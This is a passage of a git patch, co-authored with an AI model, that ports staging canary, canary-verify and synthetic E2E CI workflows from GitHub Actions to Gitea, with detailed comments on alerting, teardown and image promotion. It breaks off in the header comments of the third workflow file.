synthetic E2E every 10 min cron. Dropped workflow_dispatch.inputs. Real-cron paths intact. - e2e-api.yml — API smoke. dorny/paths-filter@v4 replaced with inline `git diff` per PR#372 pattern; detect-changes job + per-step if-gate shape preserved for branch-protection check-name parity. - e2e-staging-canvas.yml — Playwright canvas E2E. dorny/paths-filter replaced with inline git diff. 
upload-artifact@v3.2.2 kept (Gitea 1.22.x compatible per PR#372 notes; v4+ is not). - e2e-staging-external.yml — workspace-status enum regression coverage. Dropped workflow_dispatch.inputs + cron-trigger inputs. - e2e-staging-saas.yml — full lifecycle E2E. Dropped workflow_dispatch.inputs. Heaviest port; cleaned via mechanical porter then manual review. - e2e-staging-sanity.yml — weekly intentional-failure teardown sanity. github-script issue block replaced with Gitea API curl. - handlers-postgres-integration.yml — Postgres integration tests. dorny/paths-filter replaced with inline git diff. Dropped merge_group + workflow_dispatch. - harness-replays.yml — tests/harness boot suite. Standard port. Dropped merge_group + workflow_dispatch. Open questions for review: 1. workflow_run trigger on canary-verify.yml — unconfirmed Gitea 1.22.6 support. continue-on-error+canary-verify-dead doesn't block anything either way; review can validate. 2. github.event.before fallback in detect-changes paths — on Gitea the event.before field is populated for push events but its exact shape on initial pushes / forced updates differs from GitHub. The shallow-fetch + cat-file recovery branch handles the missing-base case correctly. 3. MOLECULE_STAGING_* secrets reused — verified at /etc/molecule-bootstrap/all-credentials.env that the names are defined. Tier-low because failure-mode is "smoke skip" + log warning, not silent green. DO NOT MERGE without orchestrator-dispatched Five-Axis review + @hongmingwang chat-go. Cross-links: - RFC: molecule-ai/internal#219 - Companions: PR#372, PR#378, PR#379, PR#383 Co-Authored-By: Claude Opus 4.7 (1M context) --- .gitea/workflows/canary-staging.yml | 310 ++++++++++++++++ .gitea/workflows/canary-verify.yml | 278 +++++++++++++++ .gitea/workflows/continuous-synth-e2e.yml | 255 ++++++++++++++ .gitea/workflows/e2e-api.yml | 333 ++++++++++++++++++ .gitea/workflows/e2e-staging-canvas.yml | 247 +++++++++++++ .gitea/workflows/e2e-staging-external.yml | 189 ++++++++++ .gitea/workflows/e2e-staging-saas.yml | 251 +++++++++++++ .gitea/workflows/e2e-staging-sanity.yml | 157 +++++++++ .../handlers-postgres-integration.yml | 282 +++++++++++++++ .gitea/workflows/harness-replays.yml | 262 ++++++++++++++ 10 files changed, 2564 insertions(+) create mode 100644 .gitea/workflows/canary-staging.yml create mode 100644 .gitea/workflows/canary-verify.yml create mode 100644 .gitea/workflows/continuous-synth-e2e.yml create mode 100644 .gitea/workflows/e2e-api.yml create mode 100644 .gitea/workflows/e2e-staging-canvas.yml create mode 100644 .gitea/workflows/e2e-staging-external.yml create mode 100644 .gitea/workflows/e2e-staging-saas.yml create mode 100644 .gitea/workflows/e2e-staging-sanity.yml create mode 100644 .gitea/workflows/handlers-postgres-integration.yml create mode 100644 .gitea/workflows/harness-replays.yml diff --git a/.gitea/workflows/canary-staging.yml b/.gitea/workflows/canary-staging.yml new file mode 100644 index 00000000..ff40d4db --- /dev/null +++ b/.gitea/workflows/canary-staging.yml @@ -0,0 +1,310 @@ +name: Canary — staging SaaS smoke (every 30 min) + +# Ported from .github/workflows/canary-staging.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). 
+# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Minimum viable health check: provisions one Hermes workspace on a fresh +# staging org, sends one A2A message, verifies PONG, tears down. ~8 min +# wall clock. Pages on failure by opening a GitHub issue; auto-closes the +# issue on the next green run. +# +# The full-SaaS workflow (e2e-staging-saas.yml) covers the broader surface +# but runs only on provisioning-critical pushes + nightly — this one +# catches drift in the 30-min window between those runs (AMI health, CF +# cert rotation, WorkOS session stability, etc.). +# +# Lean mode: E2E_MODE=canary skips the child workspace + HMA memory + +# peers/activity checks. One parent workspace + one A2A turn is enough +# to signal "SaaS stack end-to-end is alive." + +on: + schedule: + # Every 30 min. Cron on GitHub-hosted runners has a known drift of + # a few minutes under load — that's fine for a canary. + - cron: '*/30 * * * *' +# Serialise with the full-SaaS workflow so they don't contend for the +# same org-create quota on staging. Different group key from +# e2e-staging-saas since we don't mind queueing canaries behind one +# full run, but two canaries SHOULD queue against each other. +concurrency: + group: canary-staging + cancel-in-progress: false + +permissions: + # Needed to open / close the alerting issue. + issues: write + contents: read + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + canary: + name: Canary smoke + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + # 25 min headroom over the 15-min TLS-readiness deadline in + # tests/e2e/test_staging_full_saas.sh (#2107). Without the buffer + # the job is killed at the wall-clock 15:00 mark BEFORE the bash + # `fail` + diagnostic burst can fire, leaving every cancellation + # silent. Sibling staging E2E jobs run at 20-45 min — keeping + # canary tighter than them so a true wedge still surfaces here + # first. + timeout-minutes: 25 + + env: + MOLECULE_CP_URL: https://staging-api.moleculesai.app + MOLECULE_ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + # MiniMax is the canary's PRIMARY LLM auth path post-2026-05-04. + # Switched from hermes+OpenAI after #2578 (the staging OpenAI key + # account went over quota and stayed dead for 36+ hours, taking + # the canary red the entire time). claude-code template's + # `minimax` provider routes ANTHROPIC_BASE_URL to + # api.minimax.io/anthropic and reads MINIMAX_API_KEY at boot — + # ~5-10x cheaper per token than gpt-4.1-mini AND on a separate + # billing account, so OpenAI quota collapse no longer wedges the + # canary. Mirrors the migration continuous-synth-e2e.yml made on + # 2026-05-03 (#265) for the same reason. tests/e2e/test_staging_ + # full_saas.sh branches SECRETS_JSON on which key is present — + # MiniMax wins when set. + E2E_MINIMAX_API_KEY: ${{ secrets.MOLECULE_STAGING_MINIMAX_API_KEY }} + # Direct-Anthropic alternative for operators who don't want to + # set up a MiniMax account (priority below MiniMax — first + # non-empty wins in test_staging_full_saas.sh's secrets-injection + # block). See #2578 PR comment for the rationale. 
+ E2E_ANTHROPIC_API_KEY: ${{ secrets.MOLECULE_STAGING_ANTHROPIC_API_KEY }} + # OpenAI fallback — kept wired so an operator-dispatched run with + # E2E_RUNTIME=hermes overridden via workflow_dispatch can still + # exercise the OpenAI path without re-editing the workflow. + E2E_OPENAI_API_KEY: ${{ secrets.MOLECULE_STAGING_OPENAI_KEY }} + E2E_MODE: canary + E2E_RUNTIME: claude-code + # Pin the canary to a specific MiniMax model rather than relying + # on the per-runtime default (which could resolve to "sonnet" → + # direct Anthropic and defeat the cost saving). M2.7-highspeed + # is "Token Plan only" but cheap-per-token and fast. + E2E_MODEL_SLUG: MiniMax-M2.7-highspeed + E2E_RUN_ID: "canary-${{ github.run_id }}" + # Debug-only: when an operator dispatches with keep_on_failure=true, + # the canary script's E2E_KEEP_ORG=1 path skips teardown so the + # tenant org + EC2 stay alive for SSM-based log capture. Cron runs + # never set this (the input only exists on workflow_dispatch) so + # unattended cron always tears down. See molecule-core#129 + # failure mode #1 — capturing the actual exception requires + # docker logs from the live container. + E2E_KEEP_ORG: ${{ github.event.inputs.keep_on_failure == 'true' && '1' || '0' }} + + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify admin token present + run: | + if [ -z "$MOLECULE_ADMIN_TOKEN" ]; then + echo "::error::MOLECULE_STAGING_ADMIN_TOKEN not set" + exit 2 + fi + + - name: Verify LLM key present + run: | + # Per-runtime key check — claude-code uses MiniMax; hermes / + # langgraph (operator-dispatched only) use OpenAI. Hard-fail + # rather than soft-skip per the lesson from synth E2E #2578: + # an empty key silently falls through to the wrong + # SECRETS_JSON branch and the canary fails 5 min later with + # a confusing auth error instead of the clean "secret + # missing" message at the top. + case "${E2E_RUNTIME}" in + claude-code) + # Either MiniMax OR direct-Anthropic works — first + # non-empty wins in the test script's secrets-injection + # priority chain. Operators only need to set ONE of these + # secrets; we don't force a choice between them. + if [ -n "${E2E_MINIMAX_API_KEY:-}" ]; then + required_secret_name="MOLECULE_STAGING_MINIMAX_API_KEY" + required_secret_value="${E2E_MINIMAX_API_KEY}" + elif [ -n "${E2E_ANTHROPIC_API_KEY:-}" ]; then + required_secret_name="MOLECULE_STAGING_ANTHROPIC_API_KEY" + required_secret_value="${E2E_ANTHROPIC_API_KEY}" + else + required_secret_name="MOLECULE_STAGING_MINIMAX_API_KEY or MOLECULE_STAGING_ANTHROPIC_API_KEY" + required_secret_value="" + fi + ;; + langgraph|hermes) + required_secret_name="MOLECULE_STAGING_OPENAI_KEY" + required_secret_value="${E2E_OPENAI_API_KEY:-}" + ;; + *) + echo "::warning::Unknown E2E_RUNTIME='${E2E_RUNTIME}' — skipping LLM-key check" + required_secret_name="" + required_secret_value="present" + ;; + esac + if [ -n "$required_secret_name" ] && [ -z "$required_secret_value" ]; then + echo "::error::${required_secret_name} secret not set for runtime=${E2E_RUNTIME} — A2A will fail at request time with 'No LLM provider configured'" + exit 2 + fi + echo "LLM key present ✓ (runtime=${E2E_RUNTIME}, key=${required_secret_name}, len=${#required_secret_value})" + + - name: Canary run + id: canary + run: bash tests/e2e/test_staging_full_saas.sh + + # Alerting: open a sticky issue on the FIRST failure; comment on + # subsequent failures; auto-close on next green. 
Comment-on-existing + # de-duplicates so a single open issue accumulates the streak — + # ops sees one issue with N comments rather than N issues. + # + # Why no consecutive-failures threshold (e.g., wait 3 runs before + # filing): the prior threshold check used + # `github.rest.actions.listWorkflowRuns()` which Gitea 1.22.6 does + # not expose (returns 404). On Gitea Actions the threshold call + # ALWAYS failed, breaking the entire alerting step and going days + # silent on real regressions (38h+ chronic red on 2026-05-07/08 + # before this fix; tracked in molecule-core#129). Filing on first + # failure is also better UX — we want to know about the first red, + # not wait 90 min for it to "count." Real flakes get one issue + + # a quick close-on-green; persistent reds accumulate comments. + - name: Open issue on failure (Gitea API) + if: failure() + env: + GITEA_TOKEN: ${{ secrets.GITHUB_TOKEN }} + REPO: ${{ github.repository }} + SERVER_URL: ${{ env.GITHUB_SERVER_URL }} + RUN_ID: ${{ github.run_id }} + run: | + set -euo pipefail + API="${SERVER_URL%/}/api/v1" + TITLE="Canary failing: staging SaaS smoke" + RUN_URL="${SERVER_URL}/${REPO}/actions/runs/${RUN_ID}" + + EXISTING=$(curl -fsS -H "Authorization: token $GITEA_TOKEN" \ + "${API}/repos/${REPO}/issues?state=open&type=issues&limit=50" \ + | jq -r --arg t "$TITLE" '.[] | select(.title==$t) | .number' | head -1) + + if [ -n "$EXISTING" ]; then + curl -fsS -X POST -H "Authorization: token $GITEA_TOKEN" -H "Content-Type: application/json" \ + "${API}/repos/${REPO}/issues/${EXISTING}/comments" \ + -d "$(jq -nc --arg run "$RUN_URL" '{body: ("Canary still failing. " + $run)}')" >/dev/null + echo "Commented on existing issue #${EXISTING}" + else + NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) + BODY=$(jq -nc --arg t "$TITLE" --arg now "$NOW" --arg run "$RUN_URL" \ + '{title: $t, body: ("Canary run failed at " + $now + ".\n\nRun: " + $run + "\n\nThis issue auto-closes on the next green canary run. Consecutive failures add a comment here rather than a new issue.")}') + curl -fsS -X POST -H "Authorization: token $GITEA_TOKEN" -H "Content-Type: application/json" \ + "${API}/repos/${REPO}/issues" -d "$BODY" >/dev/null + echo "Opened canary failure issue (first red)" + fi + + - name: Auto-close canary issue on success (Gitea API) + if: success() + env: + GITEA_TOKEN: ${{ secrets.GITHUB_TOKEN }} + REPO: ${{ github.repository }} + SERVER_URL: ${{ env.GITHUB_SERVER_URL }} + RUN_ID: ${{ github.run_id }} + run: | + set -euo pipefail + API="${SERVER_URL%/}/api/v1" + TITLE="Canary failing: staging SaaS smoke" + + NUMS=$(curl -fsS -H "Authorization: token $GITEA_TOKEN" \ + "${API}/repos/${REPO}/issues?state=open&type=issues&limit=50" \ + | jq -r --arg t "$TITLE" '.[] | select(.title==$t) | .number') + + NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) + for N in $NUMS; do + curl -fsS -X POST -H "Authorization: token $GITEA_TOKEN" -H "Content-Type: application/json" \ + "${API}/repos/${REPO}/issues/${N}/comments" \ + -d "$(jq -nc --arg now "$NOW" '{body: ("Canary recovered at " + $now + ". 
Closing.")}')" >/dev/null + curl -fsS -X PATCH -H "Authorization: token $GITEA_TOKEN" -H "Content-Type: application/json" \ + "${API}/repos/${REPO}/issues/${N}" -d '{"state":"closed"}' >/dev/null + echo "Closed recovered canary issue #${N}" + done + + - name: Teardown safety net + if: always() + env: + ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + run: | + set +e + # Slug prefix matches what test_staging_full_saas.sh emits + # in canary mode: + # SLUG="e2e-canary-$(date +%Y%m%d)-${RUN_ID_SUFFIX}" + # Earlier this was `e2e-{today}-canary-` — that was the + # full-mode pattern (date FIRST, mode SECOND); canary slugs + # have mode FIRST, date SECOND. The mismatch silently + # never matched, leaving every cancelled-canary EC2 alive + # until the once-an-hour sweep eventually caught it + # (incident 2026-04-26 21:03Z: 1h25m EC2 leak before manual + # cleanup; same gap on three earlier cancellations today). + orgs=$(curl -sS "$MOLECULE_CP_URL/cp/admin/orgs" \ + -H "Authorization: Bearer $ADMIN_TOKEN" 2>/dev/null \ + | python3 -c " + import json, sys, os, datetime + run_id = os.environ.get('GITHUB_RUN_ID', '') + d = json.load(sys.stdin) + # Scope to slugs from THIS canary run when GITHUB_RUN_ID is + # available; the canary workflow sets E2E_RUN_ID='canary-\${run_id}' + # so the slug suffix is '-canary-\${run_id}-...'. Mirrors the + # full-mode safety net's per-run scoping (e2e-staging-saas.yml) + # added after the 2026-04-21 cross-run cleanup incident. + # Sweep both today AND yesterday's UTC dates so a run that + # crosses midnight still cleans up its own slug — see the + # 2026-04-26→27 canvas-safety-net incident. + today = datetime.date.today() + yesterday = today - datetime.timedelta(days=1) + dates = (today.strftime('%Y%m%d'), yesterday.strftime('%Y%m%d')) + if run_id: + prefixes = tuple(f'e2e-canary-{d}-canary-{run_id}' for d in dates) + else: + prefixes = tuple(f'e2e-canary-{d}-' for d in dates) + candidates = [o['slug'] for o in d.get('orgs', []) + if any(o.get('slug','').startswith(p) for p in prefixes) + and o.get('status') not in ('purged',)] + print('\n'.join(candidates)) + " 2>/dev/null) + # Per-slug DELETE with HTTP-code verification. The previous + # `... >/dev/null || true` swallowed every failure, so a 5xx + # or timeout from CP looked identical to "successfully cleaned + # up" and the tenant kept eating ~2 vCPU until the hourly + # stale sweep caught it (up to 2h later). Now we capture the + # response code and surface non-2xx as a workflow warning, so + # the run page shows which slug leaked. We still don't `exit 1` + # on cleanup failure — a single-canary cleanup miss shouldn't + # fail-flag the canary itself when the actual smoke check + # passed. The sweep-stale-e2e-orgs cron (now every 15 min, + # 30-min threshold) is the safety net for whatever slips past. + # See molecule-controlplane#420. + leaks=() + for slug in $orgs; do + # Tempfile-routed -w + set +e/-e prevents curl-exit-code + # pollution of the captured status (lint-curl-status-capture.yml). 
+ set +e + curl -sS -o /tmp/canary-cleanup.out -w "%{http_code}" \ + -X DELETE "$MOLECULE_CP_URL/cp/admin/tenants/$slug" \ + -H "Authorization: Bearer $ADMIN_TOKEN" \ + -H "Content-Type: application/json" \ + -d "{\"confirm\":\"$slug\"}" >/tmp/canary-cleanup.code + set -e + code=$(cat /tmp/canary-cleanup.code 2>/dev/null || echo "000") + if [ "$code" = "200" ] || [ "$code" = "204" ]; then + echo "[teardown] deleted $slug (HTTP $code)" + else + echo "::warning::canary teardown for $slug returned HTTP $code — sweep-stale-e2e-orgs will catch it within ~45 min. Body: $(head -c 300 /tmp/canary-cleanup.out 2>/dev/null)" + leaks+=("$slug") + fi + done + if [ ${#leaks[@]} -gt 0 ]; then + echo "::warning::canary teardown left ${#leaks[@]} leak(s): ${leaks[*]}" + fi + exit 0 diff --git a/.gitea/workflows/canary-verify.yml b/.gitea/workflows/canary-verify.yml new file mode 100644 index 00000000..d11cc7c5 --- /dev/null +++ b/.gitea/workflows/canary-verify.yml @@ -0,0 +1,278 @@ +name: canary-verify + +# Ported from .github/workflows/canary-verify.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# - **Gitea workflow_run trigger limitation**: Gitea 1.22.6's support +# for the `workflow_run` event is partial. If this never fires on a +# real publish-workspace-server-image completion, the follow-up +# triage PR should replace the trigger with a push-with-paths-filter +# on the same publish workflow's path (i.e. `.gitea/workflows/publish-workspace-server-image.yml`). +# + +# Runs the canary smoke suite against the staging canary tenant fleet +# after a new :staging- image lands in ECR. On green, calls the +# CP redeploy-fleet endpoint to promote :staging- → :latest so +# the prod tenant fleet's 5-minute auto-updater picks up the verified +# digest. On red, :latest stays on the prior known-good digest and +# prod is untouched. +# +# Registry note (2026-05-10): This workflow previously used GHCR +# (ghcr.io/molecule-ai/platform-tenant) — that registry was retired +# during the 2026-05-06 Gitea suspension migration when publish- +# workspace-server-image.yml switched to the operator's ECR org +# (153263036946.dkr.ecr.us-east-2.amazonaws.com/molecule-ai/ +# platform-tenant). The GHCR → ECR migration was never applied to +# this file, so canary-verify was silently smoke-testing the stale +# GHCR image while the actual staging/prod tenants ran the ECR image. +# Result: smoke tests could not catch a broken ECR build. Fix: +# - Wait step: reads SHA from running canary /health (tenant- +# agnostic, works regardless of registry). +# - Promote step: calls CP redeploy-fleet endpoint with target_tag= +# staging-, same mechanism as redeploy-tenants-on-main.yml. +# No longer attempts GHCR crane ops. +# +# Dependencies: +# - publish-workspace-server-image.yml publishes :staging- +# to ECR on staging and main merges. +# - Canary tenants are configured to pull :staging- from ECR +# (TENANT_IMAGE env set to the ECR :staging- tag). +# - Repo secrets CANARY_TENANT_URLS / CANARY_ADMIN_TOKENS / +# CANARY_CP_SHARED_SECRET are populated. 
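+#
+# Illustrative fallback (a sketch, not part of this port): if review
+# confirms workflow_run never fires on Gitea 1.22.6, the follow-up triage
+# PR could swap the trigger for the push-with-paths shape the limitation
+# note above describes. Assuming Gitea's push `paths:` filter behaves like
+# GitHub's, that would look roughly like:
+#
+#   on:
+#     push:
+#       branches: [main, staging]
+#       paths:
+#         - '.gitea/workflows/publish-workspace-server-image.yml'
+#
+# Trade-off: a push trigger fires before the image publish completes, so
+# the wait step below (which polls the tenant /health SHA) carries the
+# burden of not smoke-testing an image that has not actually landed.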
+
+on:
+  workflow_run:
+    workflows: ["publish-workspace-server-image"]
+    types: [completed]
+permissions:
+  contents: read
+  packages: write
+  actions: read
+
+env:
+  # ECR registry (post-2026-05-06 SSOT for tenant images).
+  # publish-workspace-server-image.yml pushes here.
+  IMAGE_NAME: 153263036946.dkr.ecr.us-east-2.amazonaws.com/molecule-ai/platform
+  TENANT_IMAGE_NAME: 153263036946.dkr.ecr.us-east-2.amazonaws.com/molecule-ai/platform-tenant
+  # CP endpoint for redeploy-fleet (used in promote step below).
+  CP_URL: ${{ vars.CP_URL || 'https://staging-api.moleculesai.app' }}
+  # Pinned per feedback_act_runner_github_server_url.
+  GITHUB_SERVER_URL: https://git.moleculesai.app
+
+jobs:
+  canary-smoke:
+    # Skip when the upstream workflow failed — no image to test against.
+    # workflow_dispatch trigger dropped in this Gitea port; only the
+    # workflow_run path remains.
+    if: ${{ github.event.workflow_run.conclusion == 'success' }}
+    runs-on: ubuntu-latest
+    # Phase 3 (RFC #219 §1): surface broken workflows without blocking.
+    continue-on-error: true
+    outputs:
+      sha: ${{ steps.compute.outputs.sha }}
+      smoke_ran: ${{ steps.smoke.outputs.ran }}
+    steps:
+      - name: Checkout
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+
+      - name: Compute sha
+        id: compute
+        run: echo "sha=${GITHUB_SHA::7}" >> "$GITHUB_OUTPUT"
+
+      - name: Wait for canary tenants to pick up :staging-
+        # Poll canary health endpoints every 30s for up to 7 min instead
+        # of a fixed 6-min sleep. Exits as soon as ALL canaries report
+        # the new SHA (~2-3 min typical vs 6 min fixed). Falls back to
+        # proceeding after 7 min even if not all canaries responded —
+        # the smoke suite will catch any that didn't update.
+        #
+        # NOTE: The SHA is read from the running tenant's /health response,
+        # NOT from a registry lookup. This is registry-agnostic and works
+        # regardless of whether the tenant pulls from ECR, GHCR, or any
+        # other registry — the canary is telling us what it's actually
+        # running, which is the ground truth for smoke testing.
+        env:
+          CANARY_TENANT_URLS: ${{ secrets.CANARY_TENANT_URLS }}
+          EXPECTED_SHA: ${{ steps.compute.outputs.sha }}
+        run: |
+          if [ -z "$CANARY_TENANT_URLS" ]; then
+            echo "No canary URLs configured — falling back to 60s wait"
+            sleep 60
+            exit 0
+          fi
+          IFS=',' read -ra URLS <<< "$CANARY_TENANT_URLS"
+          MAX_WAIT=420 # 7 minutes
+          INTERVAL=30
+          ELAPSED=0
+          while [ $ELAPSED -lt $MAX_WAIT ]; do
+            ALL_READY=true
+            for url in "${URLS[@]}"; do
+              HEALTH=$(curl -s --max-time 5 "${url}/health" 2>/dev/null || echo "{}")
+              SHA=$(echo "$HEALTH" | grep -o "\"sha\":\"[^\"]*\"" | head -1 | cut -d'"' -f4)
+              if [ "$SHA" != "$EXPECTED_SHA" ]; then
+                ALL_READY=false
+                break
+              fi
+            done
+            if $ALL_READY; then
+              echo "All canaries running staging-${EXPECTED_SHA} after ${ELAPSED}s"
+              exit 0
+            fi
+            echo "Waiting for canaries... (${ELAPSED}s / ${MAX_WAIT}s)"
+            sleep $INTERVAL
+            ELAPSED=$((ELAPSED + INTERVAL))
+          done
+          echo "Timeout after ${MAX_WAIT}s — proceeding anyway (smoke suite will validate)"
+
+      - name: Run canary smoke suite
+        id: smoke
+        # Graceful-skip when no canary fleet is configured (Phase 2 not yet
+        # stood up — see molecule-controlplane/docs/canary-tenants.md).
+        # Sets `ran=false` on skip so promote-to-latest stays off (we don't
+        # want every main merge auto-promoting without gating). Manual
+        # promote-latest.yml is the release gate while canary is absent.
+        # Once the fleet is real: delete the early-exit branch.
+ env: + CANARY_TENANT_URLS: ${{ secrets.CANARY_TENANT_URLS }} + CANARY_ADMIN_TOKENS: ${{ secrets.CANARY_ADMIN_TOKENS }} + CANARY_CP_BASE_URL: https://staging-api.moleculesai.app + CANARY_CP_SHARED_SECRET: ${{ secrets.CANARY_CP_SHARED_SECRET }} + run: | + set -euo pipefail + if [ -z "${CANARY_TENANT_URLS:-}" ] \ + || [ -z "${CANARY_ADMIN_TOKENS:-}" ] \ + || [ -z "${CANARY_CP_SHARED_SECRET:-}" ]; then + { + echo "## ⚠️ canary-verify skipped" + echo + echo "One or more canary secrets are unset (\`CANARY_TENANT_URLS\`, \`CANARY_ADMIN_TOKENS\`, \`CANARY_CP_SHARED_SECRET\`)." + echo "Phase 2 canary fleet has not been stood up yet —" + echo "see [canary-tenants.md](https://git.moleculesai.app/molecule-ai/molecule-controlplane/blob/main/docs/canary-tenants.md)." + echo + echo "**Skipped — promote-to-latest will NOT auto-fire.** Dispatch \`promote-latest.yml\` manually when ready." + } >> "$GITHUB_STEP_SUMMARY" + echo "ran=false" >> "$GITHUB_OUTPUT" + echo "::notice::canary-verify: skipped — no canary fleet configured" + exit 0 + fi + bash scripts/canary-smoke.sh + echo "ran=true" >> "$GITHUB_OUTPUT" + + - name: Summary on failure + if: ${{ failure() }} + run: | + { + echo "## Canary smoke FAILED" + echo + echo "Canary tenants rejected image \`staging-${{ steps.compute.outputs.sha }}\`." + echo ":latest stays pinned to the prior good digest — prod is untouched." + echo + echo "Fix forward and merge again, or investigate the specific failed" + echo "assertions in the canary-smoke step log above." + } >> "$GITHUB_STEP_SUMMARY" + + promote-to-latest: + # On green, calls the CP redeploy-fleet endpoint with target_tag= + # staging- to promote the verified ECR image. This is the same + # mechanism as redeploy-tenants-on-main.yml — no GHCR crane ops. + # + # Pre-fix history: the old GHCR promote step used `crane tag` against + # ghcr.io/molecule-ai/platform-tenant, but publish-workspace-server- + # image.yml had already migrated to ECR on 2026-05-07 (commit + # 10e510f5). The GHCR tags were never updated, so this step was + # silently promoting a stale GHCR image while actual prod tenants + # pulled from ECR. Canary smoke tests were GHCR-targeted and could + # not catch a broken ECR build. + needs: canary-smoke + if: ${{ needs.canary-smoke.result == 'success' && needs.canary-smoke.outputs.smoke_ran == 'true' }} + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + env: + SHA: ${{ needs.canary-smoke.outputs.sha }} + CP_URL: ${{ vars.CP_URL || 'https://staging-api.moleculesai.app' }} + # CP_ADMIN_API_TOKEN gates write access to the redeploy endpoint. + # Stored at the repo level so all workflows pick it up automatically. + CP_ADMIN_API_TOKEN: ${{ secrets.CP_ADMIN_API_TOKEN }} + # canary_slug pin: deploy the verified :staging- to the canary + # first (soak 120s), then fan out to the rest of the fleet. + CANARY_SLUG: ${{ vars.CANARY_PROMOTE_SLUG || '' }} + SOAK_SECONDS: ${{ vars.CANARY_PROMOTE_SOAK || '120' }} + BATCH_SIZE: ${{ vars.CANARY_PROMOTE_BATCH || '3' }} + steps: + - name: Check CP credentials + run: | + if [ -z "${CP_ADMIN_API_TOKEN:-}" ]; then + echo "::error::CP_ADMIN_API_TOKEN secret is not set — promote step cannot call redeploy-fleet." + echo "::error::Set it at: repo Settings → Actions → Variables and Secrets → New Secret." 
+ exit 1 + fi + + - name: Promote verified ECR image to :latest + run: | + set -euo pipefail + + TARGET_TAG="staging-${SHA}" + BODY=$(jq -nc \ + --arg tag "$TARGET_TAG" \ + --argjson soak "${SOAK_SECONDS:-120}" \ + --argjson batch "${BATCH_SIZE:-3}" \ + --argjson dry false \ + '{ + target_tag: $tag, + soak_seconds: $soak, + batch_size: $batch, + dry_run: $dry + }') + + if [ -n "${CANARY_SLUG:-}" ]; then + BODY=$(jq '. * {canary_slug: $slug}' --arg slug "$CANARY_SLUG" <<<"$BODY") + fi + + echo "Calling: POST $CP_URL/cp/admin/tenants/redeploy-fleet" + echo " target_tag: $TARGET_TAG" + echo " body: $BODY" + + HTTP_RESPONSE=$(mktemp) + HTTP_CODE_FILE=$(mktemp) + set +e + curl -sS -o "$HTTP_RESPONSE" -w '%{http_code}' \ + -m 1200 \ + -H "Authorization: Bearer $CP_ADMIN_API_TOKEN" \ + -H "Content-Type: application/json" \ + -X POST "$CP_URL/cp/admin/tenants/redeploy-fleet" \ + -d "$BODY" >"$HTTP_CODE_FILE" + CURL_EXIT=$? + set -e + + HTTP_CODE=$(cat "$HTTP_CODE_FILE" 2>/dev/null || echo "000") + [ -z "$HTTP_CODE" ] && HTTP_CODE="000" + + echo "HTTP $HTTP_CODE (curl exit $CURL_EXIT)" + cat "$HTTP_RESPONSE" | jq . || cat "$HTTP_RESPONSE" + + if [ "$HTTP_CODE" -ge 400 ]; then + echo "::error::CP redeploy-fleet returned HTTP $HTTP_CODE — refusing to proceed." + exit 1 + fi + + - name: Summary + run: | + { + echo "## Canary verified — :latest promoted via CP redeploy-fleet" + echo "" + echo "- **Target tag:** \`staging-${{ needs.canary-smoke.outputs.sha }}\`" + echo "- **Registry:** ECR (\`${TENANT_IMAGE_NAME}\`)" + echo "- **Canary slug:** \`${CANARY_SLUG:-}\` (soak ${SOAK_SECONDS}s)" + echo "- **Batch size:** ${BATCH_SIZE:-3}" + echo "" + echo "CP redeploy-fleet is rolling out the verified image across the prod fleet." + echo "The fleet's 5-minute health-check loop will pick up the update automatically." + } >> "$GITHUB_STEP_SUMMARY" diff --git a/.gitea/workflows/continuous-synth-e2e.yml b/.gitea/workflows/continuous-synth-e2e.yml new file mode 100644 index 00000000..f0ed9e8f --- /dev/null +++ b/.gitea/workflows/continuous-synth-e2e.yml @@ -0,0 +1,255 @@ +name: Continuous synthetic E2E (staging) + +# Ported from .github/workflows/continuous-synth-e2e.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Hard gate (#2342): cron-driven full-lifecycle E2E that catches +# regressions visible only at runtime — schema drift, deployment-pipeline +# gaps, vendor outages, env-var rotations, DNS / CF / Railway side-effects. +# +# Why this gate exists: +# PR-time CI catches code-level regressions but not deployment-time or +# integration-time ones. Today's empirical data: +# • #2345 (A2A v0.2 silent drop) — passed all unit tests, broke at +# JSON-RPC parse layer between sender and receiver. Visible only +# to a sender exercising the full path. +# • RFC #2312 chat upload — landed on staging-branch but never +# reached staging tenants because publish-workspace-server-image +# was main-only. Caught by manual dogfooding hours after deploy. +# Both would have surfaced within 15-20 min of regression if a +# continuous synth-E2E was running. 
